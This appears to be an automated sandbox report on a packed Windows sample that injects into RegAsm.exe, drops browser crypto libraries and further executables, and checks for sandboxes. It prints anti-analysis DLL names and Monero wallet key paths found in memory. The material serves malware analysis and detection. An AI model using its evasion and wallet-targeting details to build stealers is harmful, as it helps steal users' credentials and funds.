Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
Source:	Binary string: c:\rje\tg\\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: c:\rje\tg\obj\Release\ojc.pdb source: FIEHIIIJDA.exe.4.dr, vdshfd[1].exe.4.dr
Source:	Binary string: c:\rje\tg\12rr6\obj\Release\ojc.pdb source: ljhgfsd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000004.00000002.2805489536.000000003A7DE000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000004.00000002.2798282941.000000002E8F6000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3172572540.000000002005B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00418950

Source: softokn3.dll.4.dr	Static PE information: section name: .00cfg
Source: nss3.dll.4.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.4.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.4.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr	Static PE information: section name: .didat

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0042F142 push ecx; ret	4_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00422D3B push esi; ret	4_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041DDB5 push ecx; ret	4_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00432715 push 0000004Ch; iretd	4_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0BB536 push ecx; ret	4_2_6C0BB549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00438B7E push cs; iretd	12_2_00438B85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE629DE push edi; retn 0000h	16_2_1FE629E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF93C51 push es; retf	16_2_1FF93C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFCA45D push esi; ret	16_2_1FFCA45F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFC4BF0 push ecx; ret	16_2_1FFC4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_2000F456 push ebx; ret	16_2_2000F457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFFDB66 push esp; retf	16_2_1FFFDB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFFD568 push esp; retf	16_2_1FFFD570

Source: file.exe	Static PE information: section name: .text entropy: 7.995579707906101
Source: FBFHJJJDAF.exe.4.dr	Static PE information: section name: .text entropy: 7.995225395636529
Source: ljhgfsd[1].exe.4.dr	Static PE information: section name: .text entropy: 7.995225395636529
Source: FIEHIIIJDA.exe.4.dr	Static PE information: section name: .text entropy: 7.99542204298472
Source: vdshfd[1].exe.4.dr	Static PE information: section name: .text entropy: 7.99542204298472

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\FBFHJJJDAF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\FIEHIIIJDA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vdshfd[1].exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\FBFHJJJDAF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\FIEHIIIJDA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

4_2_00418950

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 4.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3465570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3465570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2380, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 9A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory allocated: 790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory allocated: 2450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory allocated: 2260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory allocated: 48E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened / queried: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

4_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 9.3 %

Source: C:\Users\user\Desktop\file.exe TID: 3852	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe TID: 1680	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5644	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe TID: 1524	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2604	Thread sleep count: 83 > 30

